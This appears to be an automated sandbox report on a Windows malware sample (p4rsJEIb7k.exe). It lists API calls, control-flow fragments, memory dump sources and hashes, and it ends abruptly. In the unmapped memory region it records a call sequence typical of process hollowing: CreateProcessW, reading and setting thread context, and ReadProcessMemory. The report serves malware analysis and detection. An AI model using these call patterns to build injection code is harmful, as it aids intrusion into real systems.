                                                                                                                APIs
                                                                                                                  • Part of subcall function 04549778: Sleep.KERNELBASE(000001F4), ref: 04549789
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 045499BF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileSleep
                                                                                                                • String ID: 7STRG7XCI4F6XGQTPP92RUP6QJ
                                                                                                                • API String ID: 2694422964-3223002266
                                                                                                                • Opcode ID: 5dbb52c7ed3fff859574b6c0b283532e13fd653ad6b62c2737601a2ec968875e
                                                                                                                • Instruction ID: 0146165029b4dbd0852f379494789996d6835729389d4aab9c355cd40b2efc42
                                                                                                                • Opcode Fuzzy Hash: 5dbb52c7ed3fff859574b6c0b283532e13fd653ad6b62c2737601a2ec968875e
                                                                                                                • Instruction Fuzzy Hash: CF519270D04288DAEF11DBB4D855BEFBBB8AF55308F004199E2497B2C1D7B91B48CB66

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 1692 410130-410142 SHGetMalloc 1693 410148-410158 SHGetDesktopFolder 1692->1693 1694 42944f-429459 call 411691 1692->1694 1695 4101d1-4101e0 1693->1695 1696 41015a-410188 call 411691 1693->1696 1695->1694 1702 4101e6-4101ee 1695->1702 1704 4101c5-4101ce 1696->1704 1705 41018a-4101a1 SHGetPathFromIDListW 1696->1705 1704->1695 1706 4101a3-4101b1 call 411691 1705->1706 1707 4101b4-4101c0 1705->1707 1706->1707 1707->1704
                                                                                                                APIs
                                                                                                                • SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                                                • SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DesktopFolderFromListMallocPath
                                                                                                                • String ID: C:\Users\user\Desktop\p4rsJEIb7k.exe
                                                                                                                • API String ID: 2281215042-1971492628
                                                                                                                • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                                • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                                                                • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                                • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph, first block 4548778-4548818; API calls on its nodes: CreateProcessW, Wow64GetThreadContext, ReadProcessMemory, Wow64SetThreadContext (node and edge list omitted)
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 04548F33
                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04548FC9
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04548FEB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 2438371351-0
                                                                                                                • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                                                • Instruction ID: 2f3b4cfe8cb714f9b12a38701214f973fd358c7fd6905ce91a72678a880af507
                                                                                                                • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                                                • Instruction Fuzzy Hash: B9620A70A14218DBEB24CFA4D841BDEB372FF98304F1091A9D10DEB294E775AE81DB59

                                                                                                                Control-flow Graph

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                                                                • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 1987 40f110-40f13a RegOpenKeyExW 1988 40f13c-40f159 RegQueryValueExW RegCloseKey 1987->1988 1989 40f15f-40f160 1987->1989 1988->1989
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3677997916-0
                                                                                                                • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                                                                • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: 4e47f038e922e84c19ecab33a0164ae102939a21ade882e67390b57c38244a2e
                                                                                                                • Instruction ID: 1f11e118333250ff1b1cce483c812f274274124743f71e781b8a547d9d3e43da
                                                                                                                • Opcode Fuzzy Hash: 4e47f038e922e84c19ecab33a0164ae102939a21ade882e67390b57c38244a2e
                                                                                                                • Instruction Fuzzy Hash: 35917E706042009FC714DF55D890A6AB7E5EF89318F14896FF849AB392D738EE41CB9E
                                                                                                                APIs
                                                                                                                • GetStartupInfoW.KERNEL32(?,0048C920,00000058), ref: 004161A8
                                                                                                                • GetCommandLineW.KERNEL32 ref: 0041623D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CommandInfoLineStartup
                                                                                                                • String ID:
                                                                                                                • API String ID: 582193876-0
                                                                                                                • Opcode ID: 0ff05a0656d0cabc76cd69936c9fb6d5f070ff973f57c73f94411b1fd4ca271d
                                                                                                                • Instruction ID: 4cece88e8d20870e626e2a15fe4d62767af7f5e44e91f32af7e3c33ec5ed94b3
                                                                                                                • Opcode Fuzzy Hash: 0ff05a0656d0cabc76cd69936c9fb6d5f070ff973f57c73f94411b1fd4ca271d
                                                                                                                • Instruction Fuzzy Hash: 5A31B771E40314E9DB10BBB2A9467EE2664AF1070CF1144AFF915AA2D3DBBCC9C18B5D
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                                                                • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000109,00000000,00425BA7,00074000,00000109,?,00425BA7,00000109,00000000,00000000), ref: 0041EF8E
                                                                                                                • GetLastError.KERNEL32(?,00425BA7,00000109,00000000,00000000), ref: 0041EF9B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2976181284-0
                                                                                                                • Opcode ID: d0e113ae251f39dc1295bd3d0d5c570924977ae37561d63c63e682e8777c236f
                                                                                                                • Instruction ID: cf4b6fdaa65d58340d4e2f426219068bfe2c256bea3d67c41a1efc08f55daa7f
                                                                                                                • Opcode Fuzzy Hash: d0e113ae251f39dc1295bd3d0d5c570924977ae37561d63c63e682e8777c236f
                                                                                                                • Instruction Fuzzy Hash: 4401F4366145147BCA115BBAAC089DA3B699F82334B250726FE34CF1D1CB78C88297A9
                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                                                • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                                                  • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection
                                                                                                                • String ID:
                                                                                                                • API String ID: 2972400715-0
                                                                                                                APIs
                                                                                                                • TranslateMessage.USER32(?), ref: 004098F6
                                                                                                                • DispatchMessageW.USER32(?), ref: 00409901
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$DispatchTranslate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1706434739-0
                                                                                                                APIs
                                                                                                                • TranslateMessage.USER32(?), ref: 004098F6
                                                                                                                • DispatchMessageW.USER32(?), ref: 00409901
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$DispatchTranslate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1706434739-0
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNELBASE(00000000,00000000,00000109,?,0042595E,00000109), ref: 0041E569
                                                                                                                • GetLastError.KERNEL32(?,0042595E,00000109), ref: 0041E573
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 918212764-0
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 04548F33
                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04548FC9
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04548FEB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 2438371351-0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 181713994-0
                                                                                                                APIs
                                                                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 10892065-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
                                                                                                                • WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: File$PointerWrite
                                                                                                                • String ID:
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: ProcWindow
                                                                                                                • String ID:
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                • Sleep.KERNEL32(00000000,00000001,00411739,?,00418391,00000018,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00416FD7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeapSleep
                                                                                                                • String ID:
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 04549789
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                APIs
